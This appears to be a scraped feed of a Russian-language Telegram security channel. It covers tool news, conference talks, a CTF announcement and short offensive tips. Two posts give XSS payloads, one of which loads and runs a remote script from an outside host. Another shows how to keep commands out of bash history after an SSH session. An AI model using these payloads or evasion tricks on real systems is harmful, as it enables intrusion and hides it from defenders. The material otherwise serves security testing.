Кстати говоря, fuzz.txt (bo0om.ru/fuzz.txt) вошёл как дефолтный словарь в dirsearch.
https://github.com/maurosoria/dirsearch
Надо про него потом еще написать :)
https://github.com/maurosoria/dirsearch
Надо про него потом еще написать :)
GitHub
GitHub - Bo0oM/fuzz.txt: Potentially dangerous files
Potentially dangerous files. Contribute to Bo0oM/fuzz.txt development by creating an account on GitHub.
❤🔥1
https://channel9.msdn.com/Events/Build/Russian-Online-Translation-Build-2016?CR_CC=200771969
А тут трансляция. Только что запустили emacs из bash'а!
Да, в windows запилили BASH! BASH КАРЛ!
А тут трансляция. Только что запустили emacs из bash'а!
Да, в windows запилили BASH! BASH КАРЛ!
Channel 9
Build 2016 (русскоязычная трансляция) (Channel 9)
Конференция Build будет посвящена всем платформам Microsoft- вас ждет множество материалов и информации о Windows, Azure, Office 365 и других решениях. Три дня през
❤🔥1
Сегодня второй день Build'а, если кому интересно. Будут опять что-то презентовать и рассказывать про будущее MS.
Трансляция тут https://channel9.msdn.com/
Трансляция тут https://channel9.msdn.com/
Docs
Shows - Event & Video Content
Browse thousands of hours of video content from Microsoft. On-demand video, certification prep, past Microsoft events, and recurring series.
❤🔥1
Один из коротких векторов для выполнения JS при XSS атаке:
Событие
Эксплуатабельность низкая, но для bugbounty, когда жесткие ограничения на длину вектора - сойдёт.
<q/oncut=alert()>X
Событие
oncut сработает, если пользователь попытается вырезать содержимое, т.е. выделет текст и нажмет CTRL+X. Эксплуатабельность низкая, но для bugbounty, когда жесткие ограничения на длину вектора - сойдёт.
❤🔥1
А это более прикольная альтернатива alert'у
Хоть и боян
<img src onerror="(function(u){var d=document,s=d.createElement('scri'+'pt');s.src=u;(d.head||d.documentElement).appendChild(s);s.parentNode.removeChild(s);}('//bo0om.ru/xss.js'));">Хоть и боян
❤🔥1
Большая коллекция ссылок по эксплуатации дескриализации в Java
https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
GitHub
GitHub - GrrrDog/Java-Deserialization-Cheat-Sheet: The cheat sheet about Java Deserialization vulnerabilities
The cheat sheet about Java Deserialization vulnerabilities - GrrrDog/Java-Deserialization-Cheat-Sheet
❤🔥1
А вот и доклады с defcon russia подъехали!
Ломаем автомобили с Алексеем Синцовым. Доклад - Testing CAN network with help of CANToolz
Видео - http://www.youtube.com/watch?v=UbkhBIhbh_o
Презентация -
http://www.slideshare.net/AlexeySintsov/testing-can-network-with-help-of-cantoolz
Репозиторий - https://github.com/eik00d/CANToolz
Доклад Александра Большева - Never Trust Your Inputs or How To Fool an ADC
Видео - http://www.youtube.com/watch?v=jH1bgIGUNc0
Презентация -
http://www.slideshare.net/DefconRussia/dcg-25-never-trust-your-inputs-or-how-to-fool-an-adc
Ломаем автомобили с Алексеем Синцовым. Доклад - Testing CAN network with help of CANToolz
Видео - http://www.youtube.com/watch?v=UbkhBIhbh_o
Презентация -
http://www.slideshare.net/AlexeySintsov/testing-can-network-with-help-of-cantoolz
Репозиторий - https://github.com/eik00d/CANToolz
Доклад Александра Большева - Never Trust Your Inputs or How To Fool an ADC
Видео - http://www.youtube.com/watch?v=jH1bgIGUNc0
Презентация -
http://www.slideshare.net/DefconRussia/dcg-25-never-trust-your-inputs-or-how-to-fool-an-adc
❤🔥1
Если ты подключен к SSH и хочешь скрыть, что делалось на машине, полезно после всех действий выполнить
Это убет собственный процесс, а последние команды в .bash_history не запишутся.
Или можно ввести
kill -9 $$Это убет собственный процесс, а последние команды в .bash_history не запишутся.
Или можно ввести
unset HISTFILE (с пробелом в начале), чтобы не писать в историю вовсе.❤🔥1
Кстати, ночью стартует HackQuest!
http://www.phdays.ru/press/news/46226/
Будет много веба, задача - найти уязвимость, успешно ее проэксплуатировать и достать некий секрет (он же флаг).
Даже если не собираешься что-то выигрывать, можешь попробовать найти уязимости на одном из сайтов, задания будут как легкие, так и хардкорные.
Когда стартанём, еще разок напомню ;)
http://www.phdays.ru/press/news/46226/
Будет много веба, задача - найти уязвимость, успешно ее проэксплуатировать и достать некий секрет (он же флаг).
Даже если не собираешься что-то выигрывать, можешь попробовать найти уязимости на одном из сайтов, задания будут как легкие, так и хардкорные.
Когда стартанём, еще разок напомню ;)
❤🔥1
Итак, стартует HackQuest
telegram.me/wlrm_phd_hq_bot
А вот и ссылка на участие :)
Да-да, прямо в telegram!
Удачи!
telegram.me/wlrm_phd_hq_bot
А вот и ссылка на участие :)
Да-да, прямо в telegram!
Удачи!
Telegram
PHDays VI. HackQuest bot
You can contact @WLRM_PHD_HQ_bot right away.
❤🔥1